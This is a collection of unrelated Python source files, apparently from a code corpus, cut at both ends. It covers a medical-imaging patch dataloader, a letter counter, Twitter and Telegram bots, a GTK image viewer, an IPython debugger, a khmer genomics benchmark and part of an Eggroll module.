samples = np.zeros((N, self.C) + tuple(self.patch_shape), dtype='float32')
sub_samples = np.zeros((N, self.C) + tuple(self.sub_patch_shape), dtype='float32')
labels = np.zeros((N,) + (9, 9, 9), dtype='int')
size = (self.sub_patch_shape - 1)/2
gl = (self.patch_shape - size)/2
gh = self.patch_shape - gl
kx, ky, kz = self.scale_factor
images = np.array([
nib_load(os.path.join(path, modal + '_subtrMeanDivStd.nii.gz')) \
for modal in self.modalities])
for n, coord in enumerate(coords):
ss, ee = self.coord_to_slice(coord)
lo, hi, pad = self.coord_to_sub_slice(coord)
cropped_label = label[ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
labels[n] = cropped_label[gl[0]:gh[0], gl[1]:gh[1], gl[2]:gh[2]]
samples[n] = images[:, ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
pimages = np.pad(images, [(0, 0)] + pad, mode='constant') \
if np.sum(pad) > 0 else images
sub_samples[n] = \
pimages[:, lo[0]:hi[0]:kx, lo[1]:hi[1]:ky, lo[2]:hi[2]:kz]
return samples, sub_samples, labels
def __call__(self, index):
return self.__getitem__(index)
def __getitem__(self, index):
path = self.names[index]
mask_file = os.path.join(path, 'brainmask.nii.gz')
mask = nib_load(mask_file)
label_file = os.path.join(path, 'OTMultiClass.nii.gz')
label = nib_load(label_file)
n = self.sample_size
if self.split == 'train':
fg = (label > 0).astype('int32')
bg = ((mask > 0) * (fg == 0)).astype('int32')
coords = np.concatenate(
[sample_coords(n/2, self.patch_shape, weight) for weight in (fg, bg)])
elif self.split == 'valid':
coords = sample_coords(n, self.patch_shape, mask)
else: # test
coords = get_all_coords((9, 9, 9), self.patch_shape, SHAPE, 15)
samples, sub_samples, labels = self.crop(coords, label, path)
return samples, sub_samples, labels, coords
def __len__(self):
return len(self.names)
class Tuple(Dataset):
def __init__(self, data):
self.data = data
def __getitem__(self, index):
return [d[index] for d in self.data]
def __len__(self):
return len(self.data[0])
def default_collate_fn(batch):
return [torch.cat([torch.from_numpy(t) for t in v]) for v in zip(*batch)]
class PEDataLoader(object):
"""
A multiprocess-dataloader that parallels over elements as suppose to
over batches (the torch built-in one)
Input dataset must be callable with index argument: dataset(index)
https://github.com/thuyen/nnet/blob/master/pedataloader.py
"""
def __init__(self, dataset, batch_size=1, shuffle=False,
num_workers=None, pin_memory=False, num_batches=None):
self.dataset = dataset
self.batch_size = batch_size
self.shuffle = shuffle
self.num_workers = num_workers
self.collate_fn = default_collate_fn
self.pin_memory_fn = \
torch.utils.data.dataloader.pin_memory_batch if pin_memory else \
lambda x: x
self.num_samples = len(dataset)
self.num_batches = num_batches or \
int(math.ceil(self.num_samples / float(self.batch_size)))
self.pool = mp.Pool(num_workers)
self.buffer = queue.Queue(maxsize=1)
self.start()
def generate_batches(self):
if self.shuffle:
indices = torch.LongTensor(self.batch_size)
for b in range(self.num_batches):
indices.random_(0, self.num_samples-1)
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
else:
self.indices = torch.LongTensor(range(self.num_samples))
for b in range(self.num_batches):
start_index = b*self.batch_size
end_index = (b+1)*self.batch_size if b < self.num_batches - 1 \
else self.num_samples
indices = self.indices[start_index:end_index]
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
def start(self):
def _thread():
for b in self.generate_batches():
self.buffer.put(b, block=True)
self.buffer.put(None)
thread = threading.Thread(target=_thread)
thread.daemon = True
thread.start()
def __next__(self):
batch = self.buffer.get()
if batch is None:
self.start()
raise StopIteration
return batch
next = __next__
def __iter__(self):
return self
def __len__(self):
return self.num_batches
|
letter_counter.py
|
import json
import urllib.request
import time
from threading import Thread, Lock
finished_count = 0
def count_letters(url, frequency, mutex):
response = urllib.request.urlopen(url)
txt = str(response.read())
mutex.acquire()
for l in txt:
letter = l.lower()
if letter in frequency:
frequency[letter] += 1
global finished_count
finished_count += 1
mutex.release()
def main():
frequency = {}
mutex = Lock()
for c in "abcdefghijklmnopqrstuvwxyz":
frequency[c] = 0
start = time.time()
for i in range(1000, 1020):
Thread(target=count_letters, args=(f"https://www.rfc-editor.org/rfc/rfc{i}.txt", frequency, mutex)).start()
while True:
mutex.acquire()
if finished_count == 20:
break
mutex.release()
time.sleep(0.5)
end = time.time()
print(json.dumps(frequency, indent=4))
print("Done, time taken", end - start)
main()
|
markovtweets.py
|
from time import sleep
from datetime import datetime
import calendar
import threading
import random
import logging
import os
from . import markov_chain
from . import string_control
class MarkovTweets:
def __init__(self, api, settings):
self.api = api
self.settings = settings
self.chain = markov_chain.build_chain(markov_chain.read_file(settings["markov_chain_source"]))
def automatic_sentence(self):
while True:
if self.settings["random_hashtag"]:
if random.random() <= self.settings["random_hashtag_percentage"]:
hashtag = random.choice(self.api.trending_type("116545", "Hashtag"))
else:
hashtag = ""
random_message = markov_chain.create_message(self.chain, max_length=self.settings["tweet_max_words"])
random_message = string_control.clean_blank_space(random_message)
random_message = string_control.limit_check(random_message, self.settings["twitter_char_limit"], hashtag)
self.api.update_status(random_message)
sleep(self.settings["random_message_timer"])
@staticmethod
def __twitter_string_to_date(date_string):
date_list = date_string.split()
return datetime.strptime(f"{list(calendar.month_abbr).index(date_list[1])} {date_list[2]} {date_list[3]} {date_list[5]}", '%m %d %H:%M:%S %y')
def start(self):
if self.settings["random_message"]:
threading.Thread(target=self.automatic_sentence).start()
if os.path.exists("last_tweet_date.txt"):
with open('last_tweet_date.txt', 'r+') as file:
old_tweet_date = self.__twitter_string_to_date(file.read().replace('\n', ''))
else:
open('last_tweet_date.txt', 'w').close()
old_tweet_date = datetime.now()
while True:
r = self.api.get_mentions()
if r.status_code == 429:
logging.warning("API limit reached." + datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
else:
for response in r.json():
if old_tweet_date < self.__twitter_string_to_date(response["created_at"]):
input_starting_sentence = response["text"].replace(self.settings["bot_username"], "")
message = markov_chain.create_message(self.chain, max_length=self.settings["tweet_max_words"], starting_sentence=input_starting_sentence)
final_message = string_control.clean_blank_space(message)
final_message = string_control.limit_check(final_message, self.settings["twitter_char_limit"], " @" + response["user"]["screen_name"])
self.api.update_status(final_message, in_reply_to_status_id=response["id"])
else:
break
old_tweet_date = self.__twitter_string_to_date(r.json()[0]["created_at"])
with open('last_tweet_date.txt', 'w') as file:
file.write(r.json()[0]["created_at"])
sleep(15)
|
DynamicMedia.py
|
#!/usr/bin/python3
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, GObject, GdkPixbuf, Gdk
import tempfile
import cgi,posixpath
import time
import urllib.request,urllib.parse
import os
from shutil import copyfile
from threading import Thread
try:
import math
inf=math.inf
except:
inf=float("inf")
scale_method=GdkPixbuf.InterpType.BILINEAR
(TARGET_ENTRY_TEXT, TARGET_ENTRY_PIXBUF) = range(2)
(COLUMN_TEXT, COLUMN_PIXBUF) = range(2)
DRAG_ACTION = Gdk.DragAction.COPY
tempdirobj=tempfile.TemporaryDirectory(prefix="booru-browse-")
tempdir=tempdirobj.name
print("using tempdir:",tempdir)
def getName(url,content):
domain=urllib.parse.urlsplit(url).netloc
disposition=content.getheader('content-disposition')
if disposition:
_,params=cgi.parse_header(disposition)
return domain,params['filename']
else:
return domain,posixpath.basename(urllib.parse.urlsplit(url).path)
imgcache={}
def loadWithProgress(url, progress):
request=urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
content=urllib.request.urlopen(request)
buff=bytes()
length=content.getheader('content-length')
domain,name=getName(url,content)
#print(domain,name)
if length:
length=int(length)
blocksize=max(4096, length//100)
else:
"set up pulsing progress bar"
def progUpdate():
have=len(buff)
if have<length:
progress.set_fraction(have/length)
return True
return False
GObject.idle_add(progUpdate)
timer=time.time()
while True:
read=content.read(blocksize)
if read:
buff+=read
else:
break
timer=time.time()-timer
print("{}\n\ttook {:.2f} seconds, speed was {:.2f} KB/s".format(url, timer, len(buff)/(timer*1024)))
#cache the image
path=os.path.join(tempdir, domain)
if not os.path.exists(path):
os.mkdir(path)
path="{}/{}".format(path,name)
return path, name,buff
class DynamicMedia(Gtk.EventBox):
def __init__(self, path=None, url=None):
super(DynamicMedia, self).__init__()
#some properties
self.media=Gtk.Image()
self.name=""
self.buf=None
self.path=None
self.fit=True
self.allowUpscale=True
self.draggable=False
self.lastPath=os.path.expanduser('~/Downloads')
def toggle(w, e):
self.fit=not self.fit
self.connect("button_release_event", toggle)
#actually send the data
def data_get(widget,context,selection,info,evttime):
print("drag dropped")
#print(type(selection))
#print(widget,context,selection,info,evttime)
selection.set_uris(["file://"+self.path])
self.connect('drag_data_get',data_get)
#assemble everything
overlay=Gtk.Overlay()
overlay.add(self.media)
self.progressbox=Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
overlay.add_overlay(self.progressbox)
self.add(overlay)
GObject.idle_add(self.resizeSelf)
self.load(path, url)
def enableDrag(self):
if os.name=='nt':
print("Drag n Drop not supported on windows")
return
targets=[
#Gtk.TargetEntry.new('image/x-xpixmap',0,TARGET_ENTRY_PIXBUF),
Gtk.TargetEntry.new('text/uri-list',0,TARGET_ENTRY_PIXBUF),
#Gtk.TargetEntry.new('text/plain',0,TARGET_ENTRY_TEXT),
]
self.drag_source_set(Gdk.ModifierType.BUTTON1_MASK,targets,DRAG_ACTION)
self.draggable=True
def disableDrag(self):
self.drag_source_unset()
self.draggable=False
def generateDrag(self):
if self.draggable and self.buf:
pbuf=self.buf.get_static_image()
(x,y)=(pbuf.get_width(),pbuf.get_height())
scale=128/max(x,y)
self.drag_source_set_icon_pixbuf(pbuf.scale_simple(scale*x,scale*y,scale_method))
def load(self, path=None, url=None):
if path:
self.name=os.path.basename(path)
with open(path,'rb') as f:
#TODO: make copy in temp dir?
self.path=path
loader=GdkPixbuf.PixbufLoader()
loader.write(f.read())
loader.close()
#self.buf=GdkPixbuf.PixbufAnimation.new_from_file(path)
self.buf=loader.get_animation()
self.iter=self.buf.get_iter()
self.media.set_from_animation(self.buf)
self.enableDrag()
self.generateDrag()
elif url:
#if cached, use cached image
if url in imgcache:
self.load(path=imgcache[url])
return
loadbar=Gtk.ProgressBar()
#if this is unset, then the displayed text will be the load percent
#that said,
#loadbar.set_text(url)
loadbar.show()
self.progressbox.add(loadbar)
def asyncload():
loader=GdkPixbuf.PixbufLoader()
#these need to be stored separate from the self versions to prevent race conditions in cache
path, name,buff=loadWithProgress(url, loadbar)
(self.path,self.name)=(path, name)
loader.write(buff)
loader.close()
#self.name=source.info().get_filename()
#print("got filename: ", self.name)
self.buf=loader.get_animation()
self.iter=self.buf.get_iter()
def finish():
self.media.set_from_animation(self.buf)
self.progressbox.remove(loadbar)
self.enableDrag()
self.generateDrag()
return False
GObject.idle_add(finish)
#flush to disk in background
with open(path,'wb+') as f:
f.write(buff)
imgcache[url]=path
t=Thread(target=asyncload, daemon=True)
t.start()
else:
#TODO: in the future, should empty current content
self.disableDrag()
return
def resizeSelf(self):
if not self.buf:
return True
container=self.get_parent().get_allocation()
(x, y)=(container.width, container.height)
(realx, realy)=(self.buf.get_width(), self.buf.get_height())
scale=min(x/realx, y/realy, inf if self.allowUpscale else 1) if self.fit else 1
(x, y)=(scale*realx, scale*realy)
if self.buf.is_static_image():
self.media.set_from_pixbuf(
self.buf.get_static_image().scale_simple(x,y,scale_method)
)
elif hasattr(self, 'iter') and self.iter.advance():
self.media.set_from_pixbuf(
self.iter.get_pixbuf().scale_simple(x,y,scale_method)
)
#TODO: the best approach here might just be doing the animation stepping myself, for both static and not
#self.media.set_from_animation(pixbuf_anim_copy_resize(self.buf, x, y))
return True
def saveDialog(self, rootwin=None):
#TODO: wait (in bg thread) to ensure disk file is fully written before opening save dialog
if not self.path:
print("no image loaded, cant save")
return
print("saving media!")
dialog=Gtk.FileChooserDialog(
"Save image", rootwin,
Gtk.FileChooserAction.SAVE,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_SAVE, Gtk.ResponseType.OK)
)
print("default name should be:", self.name)
dialog.set_current_folder(self.lastPath)
dialog.set_current_name(self.name)
dialog.set_do_overwrite_confirmation(True)
response=dialog.run()
if response==Gtk.ResponseType.OK:
saveto=dialog.get_filename()
self.lastPath=os.path.dirname(saveto)
print("saving to:", saveto)
copyfile(self.path, saveto)
elif response==Gtk.ResponseType.CANCEL:
print("save canceled")
dialog.destroy()
if __name__=="__main__":
win=Gtk.Window()
win.connect("delete-event", lambda wid, event:Gtk.main_quit())
win.set_size_request(320, 240)
win.set_title("Title")
#img=DynamicMedia('8db.jpg')
#img=DynamicMedia('54a.gif')
#img=DynamicMedia('Red-Big-Frog-Wallpaper-Photos-202.jpg')
img=DynamicMedia(url='http://i0.kym-cdn.com/photos/images/newsfeed/001/256/886/074.gif')
sw=Gtk.ScrolledWindow()
sw.add(img)
win.add(sw)
win.show_all()
GObject.threads_init()
Gtk.main()
|
debugger.py
|
import asyncio
import signal
import sys
import threading
from IPython.core.debugger import Pdb
from IPython.core.completer import IPCompleter
from .ptutils import IPythonPTCompleter
from .shortcuts import create_ipython_shortcuts, suspend_to_bg, cursor_in_leading_ws
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import (Condition, has_focus, has_selection,
vi_insert_mode, emacs_insert_mode)
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.bindings.completion import display_completions_like_readline
from pygments.token import Token
from prompt_toolkit.shortcuts.prompt import PromptSession
from prompt_toolkit.enums import EditingMode
from prompt_toolkit.formatted_text import PygmentsTokens
from prompt_toolkit import __version__ as ptk_version
PTK3 = ptk_version.startswith('3.')
class TerminalPdb(Pdb):
"""Standalone IPython debugger."""
def __init__(self, *args, **kwargs):
Pdb.__init__(self, *args, **kwargs)
self._ptcomp = None
self.pt_init()
def pt_init(self):
def get_prompt_tokens():
return [(Token.Prompt, self.prompt)]
if self._ptcomp is None:
compl = IPCompleter(shell=self.shell,
namespace={},
global_namespace={},
parent=self.shell,
)
self._ptcomp = IPythonPTCompleter(compl)
options = dict(
message=(lambda: PygmentsTokens(get_prompt_tokens())),
editing_mode=getattr(EditingMode, self.shell.editing_mode.upper()),
key_bindings=create_ipython_shortcuts(self.shell),
history=self.shell.debugger_history,
completer=self._ptcomp,
enable_history_search=True,
mouse_support=self.shell.mouse_support,
complete_style=self.shell.pt_complete_style,
style=self.shell.style,
color_depth=self.shell.color_depth,
)
if not PTK3:
options['inputhook'] = self.shell.inputhook
self.pt_loop = asyncio.new_event_loop()
self.pt_app = PromptSession(**options)
def cmdloop(self, intro=None):
"""Repeatedly issue a prompt, accept input, parse an initial prefix
off the received input, and dispatch to action methods, passing them
the remainder of the line as argument.
override the same methods from cmd.Cmd to provide prompt toolkit replacement.
"""
if not self.use_rawinput:
raise ValueError('Sorry ipdb does not support use_rawinput=False')
# In order to make sure that prompt, which uses asyncio doesn't
# interfere with applications in which it's used, we always run the
# prompt itself in a different thread (we can't start an event loop
# within an event loop). This new thread won't have any event loop
# running, and here we run our prompt-loop.
self.preloop()
try:
if intro is not None:
self.intro = intro
if self.intro:
self.stdout.write(str(self.intro)+"\n")
stop = None
while not stop:
if self.cmdqueue:
line = self.cmdqueue.pop(0)
else:
self._ptcomp.ipy_completer.namespace = self.curframe_locals
self._ptcomp.ipy_completer.global_namespace = self.curframe.f_globals
# Run the prompt in a different thread.
line = ''
keyboard_interrupt = False
def in_thread():
nonlocal line, keyboard_interrupt
try:
line = self.pt_app.prompt()
except EOFError:
line = 'EOF'
except KeyboardInterrupt:
keyboard_interrupt = True
th = threading.Thread(target=in_thread)
th.start()
th.join()
if keyboard_interrupt:
raise KeyboardInterrupt
line = self.precmd(line)
stop = self.onecmd(line)
stop = self.postcmd(stop, line)
self.postloop()
except Exception:
raise
def set_trace(frame=None):
"""
Start debugging from `frame`.
If frame is not specified, debugging starts from caller's frame.
"""
TerminalPdb().set_trace(frame or sys._getframe().f_back)
if __name__ == '__main__':
import pdb
# IPython.core.debugger.Pdb.trace_dispatch shall not catch
# bdb.BdbQuit. When started through __main__ and an exception
# happened after hitting "c", this is needed in order to
# be able to quit the debugging session (see #9950).
old_trace_dispatch = pdb.Pdb.trace_dispatch
pdb.Pdb = TerminalPdb
pdb.Pdb.trace_dispatch = old_trace_dispatch
pdb.main()
|
bot.py
|
"""
[emoji symbols]
orange box : 🔸
man with laptop : 👨💻
"""
import os
import telebot
from telebot import types
import random
import json
import threading ,schedule,time #extras
from utils.github_tools import *
TOKEN = open('test-key.txt').readline()
# TOKEN = os.getenv('TG_TOKEN')
cpp_data = json.load(open('utils/resource/cpp_resource.json'))
bot = telebot.TeleBot(TOKEN,parse_mode='HTML')
print("Bot is online")
hey_msg = ['Hi ','Hello ','Hey ']
bot_name = ['Developer','Coder','Mastermind','Cool','Resource']
user_name = ['Developer','Coder','Genius','Mastermind','Buddy','Programmer']
knownUsers = []
userStep = {}
#----------------Keyboard Layouts--------------------
#command_cpp keyboard [value=cpp]
cpp_select = types.ReplyKeyboardMarkup(one_time_keyboard=True)
cpp_select.add('Youtube videos','PDFs','Courses','Websites(Learning)','Websites(Practice)')
#command_github keyboard [value=github]
github_select = types.ReplyKeyboardMarkup(one_time_keyboard=True)
github_select.add('Search','Search(by user)')
github_select.add('Clone Repository')
hideBoard = types.ReplyKeyboardRemove() # hide the keyboard
commands = {
'start':'Restart bot',
'cpp' : 'C++ resources',
'github' : 'Search and clone Repository',
'codeforces' : 'still in development...',
'stackoverflow' : 'still in development...',
'help': 'Help',
'all' : 'List all commands',
}
#--------------------others functions----------------------
#get resource data
def cpp_resource(NAME):
for cpp in cpp_data:
if cpp['name'] == NAME:
text = ''
for i in cpp:
if i!='name':
text += '🔸 '
text += i
text += "\n"
text += cpp[i]
text += "\n\n"
return text
def get_user_step(uid):
if uid in userStep:
return userStep[uid]
else:
knownUsers.append(uid)
userStep[uid] = 0
print("New user detected")
return 0
#console output
def listener(messages):
for m in messages:
if m.content_type == 'text':
print(m.from_user.first_name +'['+ str(m.chat.id) + "] : " + m.text)
bot.set_update_listener(listener)
#------------------------All main commands--------------------------
@bot.message_handler(commands=['all'])
def command_all(m):
text = " All available commands 👨💻 : \n\n"
for key in commands:
text += "🔸 /" + key + " : "
text += commands[key] + "\n\n"
bot.send_message(m.chat.id, text)
@bot.message_handler(commands=['cpp'])
def command_cpp(m):
cid = m.chat.id
bot.send_message(cid, "What do you want ?", reply_markup=cpp_select)
userStep[cid] = 'cpp'
@bot.message_handler(commands=['github'])
def command_github(m):
cid = m.chat.id
bot.send_message(cid, "What do you want ?", reply_markup=github_select)
userStep[cid] = 'github'
@bot.message_handler(commands=['codeforces'])
def command_codeforces(m):
text = "Still in development..."
bot.reply_to(m, text)
@bot.message_handler(commands=['stackoverflow'])
def command_stackoverflow(m):
text = "Comming soon....."
bot.reply_to(m, text)
@bot.message_handler(commands=['help'])
def command_help(m):
bot.send_chat_action(m.chat.id, 'typing')
text = random.choice(hey_msg)
if m.chat.type == "private":
text += m.chat.first_name
else:
text += random.choice(user_name)
text += ' , I am a '+ random.choice(bot_name) + " Bot"
text += '\n\nI can do following things :'
text += '\n 🔸 Provide C++ Resources'
text += '\n 🔸 Github search , Clone Repository'
text += '\n 🔸 Codeforces Visualizer, Random Problems(comming soon)'
text += '\n 🔸 Stackoverflow Search (comming soon)'
text += "\n\nSee all commands at /all :)"
text += "\n\n\nContact Developer 👨💻: @vishal2376"
bot.reply_to(m, text)
@bot.message_handler(commands=['start'])
def command_start(m):
cid = m.chat.id
if cid not in knownUsers:
knownUsers.append(cid)
userStep[cid] = 0
command_help(m)
#-------------------Custom keyboard functions-------------------
#---------------------------cpp-----------------------------
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'cpp')
def msg_cpp_select(m):
cid = m.chat.id
# userStep[cid] = 0
bot.send_chat_action(cid, 'typing')
if m.text == 'Youtube videos':
text = cpp_resource('yt')
bot.send_message(cid,text,disable_web_page_preview=True,reply_markup=hideBoard)
elif m.text =='PDFs':
text = cpp_resource('pdf')
bot.send_message(cid,text,disable_web_page_preview=True,reply_markup=hideBoard)
elif m.text =='Websites(Practice)':
text = cpp_resource('practice_websites')
bot.send_message(cid,text,disable_web_page_preview=True,reply_markup=hideBoard)
elif m.text =='Websites(Learning)':
text = cpp_resource('learning_websites')
bot.send_message(cid,text,disable_web_page_preview=True,reply_markup=hideBoard)
elif m.text =='Courses':
text = cpp_resource('courses')
bot.send_message(cid,text,disable_web_page_preview=True)
else:
bot.send_message(cid, "Invalid Commands")
#-------------------github all functions-------------------------
#[value=github]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github')
def msg_github_select(m):
cid = m.chat.id
userStep[cid] = 0
bot.send_chat_action(cid, 'typing')
if m.text == 'Search':
# text = 'Not available for some days'
text = 'Enter your query '
bot.send_message(m.chat.id,text,reply_markup=hideBoard)
userStep[cid] = 'github_search'
elif m.text == 'Search(by user)':
text = 'Enter username \nExample : vishal2376'
bot.send_message(m.chat.id,text,reply_markup=hideBoard)
userStep[cid] = 'github_search_user'
elif m.text == 'Clone Repository':
text = 'Enter username \nExample : vishal2376'
bot.send_message(m.chat.id,text,reply_markup=hideBoard)
userStep[cid] = 'github_clone_view'
else:
bot.send_message(cid, "Invalid Commands")
#[value=github_clone]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github_clone')
def msg_github_clone(m):
cid = m.chat.id
userStep[cid] = 0
user_name = ''
with open('github/user_name.txt','r') as f:
user_name = f.readline()
repo_list = get_repo_list(user_name)
try:
for repo_name in repo_list:
if m.text == '/stop':
bot.send_message(cid,"Successfully stopped",reply_markup=hideBoard)
break
elif m.text == repo_name:
full_repo = user_name +'/'+repo_name
bot.send_chat_action(cid, 'typing')
text = 'https://github.com/'+full_repo+'/archive/refs/heads/master.zip'
msg = bot.send_message(cid,text,reply_markup=hideBoard)
except Exception as e:
bot.send_message(cid,'Something went Wrong',reply_markup=hideBoard)
print('Error : Failed to download or send files')
#[value=github_clone_view]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github_clone_view')
def view_clone_repo(m):
try:
repo_list = get_repo_list(m.text)
button = types.ReplyKeyboardMarkup(one_time_keyboard=True)
for repo_name in repo_list:
button.add(repo_name)
bot.send_message(m.chat.id,'Click button to clone Repository \n\nUse /stop to exit',reply_markup=button)
userStep[m.chat.id] = 'github_clone'
except Exception as e:
bot.send_message(m.chat.id,'Something went wrong , Try again later',reply_markup=hideBoard)
print("Error : Keyboard not created")
#[value=github_search_user]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github_search_user')
def view_user_repo(m):
try:
userStep[m.chat.id]=0
repo_list = get_repo_list(m.text,1)
text = 'Github Repository List\n\n'
for repo_name in repo_list:
name = repo_name.split('/')[1]
stars = get_repo_stars(repo_name)
issues = get_repo_issues(repo_name)
text += '🔸 <b>'+ name + '</b>\n'
text += 'Stars : '+str(stars)+' | Issues : '+ str(issues)
text += '\n<a href = "https://github.com/'+ repo_name + '">Click here to visit</a>\n\n'
bot.send_message(m.chat.id,text,disable_web_page_preview=True)
except Exception as e:
bot.send_message(m.chat.id,'Github API search Limit exceed',reply_markup=hideBoard)
print("Error : Github search Limit exceed")
#[value=github_search]
@bot.message_handler(func=lambda message: get_user_step(message.chat.id) == 'github_search')
def view_repo(m):
try:
userStep[m.chat.id]=0
repo_list = search_repo(m.text)
text = 'Top Search Results \n\n'
for repo_name in repo_list:
#name = repo_name.split('/')[1]
stars = get_repo_stars(repo_name)
issues = get_repo_issues(repo_name)
text += '🔸 '+ repo_name + '\n'
text += 'Stars : '+str(stars)+' | Issues : '+ str(issues)
text += '\n<a href = "https://github.com/'+ repo_name + '">Click here to visit</a>\n\n'
bot.send_message(m.chat.id,text,disable_web_page_preview=True)
except Exception as e:
bot.send_message(m.chat.id,'Github API search Limit exceed',reply_markup=hideBoard)
print("Error : Search limit exceed")
#-------------------------------------------------
#-----------------EXTRA-------------------------
run = True
rem_time = '20:15'
def remainder():
msg = "⏰ [Remainder]\n\n"
msg += "👨💻 Codeforces Contest will start in 15min.\n"
msg += "\nLink : "
msg += rem_link
bot.send_message(grp_id,msg,disable_web_page_preview=True)
global run
run = False
return schedule.CancelJob
#-------------------------------------------------
#-------------------------------------------------
# filter message
@bot.message_handler(func=lambda message: True, content_types=['text'])
def command_default(m):
lower_text = m.text.lower()
if lower_text == 'hello' or lower_text == 'hi':
text = random.choice(hey_msg)
text += m.from_user.first_name
bot.reply_to(m, text)
if 'https://codeforces.com/contestInvitation' in m.text:
global grp_id
global rem_link
grp_id = m.chat.id
rem_link = m.text
schedule.every().day.at(rem_time).do(remainder)
text = "⏰ Codeforces remainder scheduled\n"
bot.send_message(m.chat.id,text)
def forever():
while run:
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=forever,name='remainder')
t1.start()
bot.polling()
|
bench-graphsize-th.py
|
#! /usr/bin/env python2
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2013. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
import khmer
import sys
import screed
import threading
import Queue
K = 14
HASHTABLE_SIZE = int(1e9)
THRESHOLD = 100
GROUPSIZE = 100
WORKER_THREADS = 4
def process(inq, outq, ht):
global worker_count
while not done or not inq.empty():
try:
recordlist = inq.get(True, 1)
except Queue.Empty:
continue
x = []
for record in recordlist:
kmer = record['sequence'][:K]
size = ht.calc_connected_graph_size(kmer, THRESHOLD)
if size >= THRESHOLD:
x.append(record)
outq.put(x)
worker_count -= 1
def write(outq, outfp):
global worker_count
while worker_count > 0 or not outq.empty():
try:
recordlist = outq.get(True, 1)
except Queue.Empty:
continue
for record in recordlist:
outfp.write('>%s\n%s\n' % (record['name'], record['sequence']))
def main():
global done, worker_count
done = False
worker_count = 0
infile = sys.argv[1]
outfile = infile + '.graphsize2'
print 'creating ht'
ht = khmer.new_hashbits(K, HASHTABLE_SIZE, 1)
print 'eating fa', infile
total_reads, n_consumed = ht.consume_fasta(infile)
outfp = open(outfile, 'w')
inqueue = Queue.Queue(50)
outqueue = Queue.Queue(50)
# worker and writer threads
for i in range(WORKER_THREADS):
t = threading.Thread(target=process, args=(inqueue, outqueue, ht))
worker_count += 1
t.start()
threading.Thread(target=write, args=(outqueue, outfp)).start()
# main thread
x = []
i = 0
for n, record in enumerate(screed.fasta.fasta_iter(open(infile))):
if n % 10000 == 0:
print '...', n
x.append(record)
i += 1
if i > GROUPSIZE:
inqueue.put(x)
x = []
i = 0
inqueue.put(x)
done = True
if __name__ == '__main__':
main()
|
roll_pair.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2019 - now, Eggroll Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import uuid
from concurrent.futures import wait, FIRST_EXCEPTION
from threading import Thread
from eggroll.core.aspects import _method_profile_logger
from eggroll.core.client import CommandClient
from eggroll.core.command.command_model import CommandURI
from eggroll.core.conf_keys import SessionConfKeys
from eggroll.core.constants import StoreTypes, SerdesTypes, PartitionerTypes, \
SessionStatus
from eggroll.core.datastructure.broker import FifoBroker
from eggroll.core.meta_model import ErStoreLocator, ErJob, ErStore, ErFunctor, \
ErTask, ErPair, ErPartition
from eggroll.core.serdes import cloudpickle
from eggroll.core.session import ErSession
from eggroll.core.utils import generate_job_id, generate_task_id
from eggroll.core.utils import string_to_bytes, hash_code
from eggroll.roll_pair import create_serdes
from eggroll.roll_pair.transfer_pair import TransferPair, BatchBroker
from eggroll.roll_pair.utils.gc_utils import GcRecorder
from eggroll.roll_pair.utils.pair_utils import partitioner
from eggroll.utils.log_utils import get_logger
L = get_logger()
def runtime_init(session: ErSession):
rpc = RollPairContext(session=session)
return rpc
class RollPairContext(object):
def __init__(self, session: ErSession):
if session.get_session_meta()._status != SessionStatus.ACTIVE:
raise Exception(f"session:{session.get_session_id()} is not available, init first!")
self.__session = session
self.session_id = session.get_session_id()
self.default_store_type = StoreTypes.ROLLPAIR_LMDB
self.default_store_serdes = SerdesTypes.PICKLE
self.deploy_mode = session.get_option(SessionConfKeys.CONFKEY_SESSION_DEPLOY_MODE)
self.__session_meta = session.get_session_meta()
self.__session.add_exit_task(self.context_gc)
self.rpc_gc_enable = True
self.gc_recorder = GcRecorder(self)
self.__command_client = CommandClient()
def set_store_type(self, store_type: str):
self.default_store_type = store_type
def set_store_serdes(self, serdes_type: str):
self.default_store_serdes = serdes_type
def set_session_gc_enable(self):
self.rpc_gc_enable = True
def set_session_gc_disable(self):
self.rpc_gc_enable = False
def get_session(self):
return self.__session
def get_roll(self):
ret = self.__session._rolls[0]
if not ret._command_endpoint._host or not ret._command_endpoint._port:
L.error(f"invalid roll processor:{ret}, session_meta:{self.__session_meta}")
raise ValueError(f"invalid roll endpoint:{ret}")
return ret
def context_gc(self):
self.gc_recorder.stop()
if self.gc_recorder.gc_recorder is None or len(self.gc_recorder.gc_recorder) == 0:
L.info("rp context gc_recorder is None or empty!")
return
for k, v in (self.gc_recorder.gc_recorder.items()):
L.debug("before exit the task:{} cleaning item:{}".format(self.session_id, k))
name = k
rp = self.load(namespace=self.session_id, name=name)
rp.destroy()
def route_to_egg(self, partition: ErPartition):
return self.__session.route_to_egg(partition)
def populate_processor(self, store: ErStore):
populated_partitions = list()
for p in store._partitions:
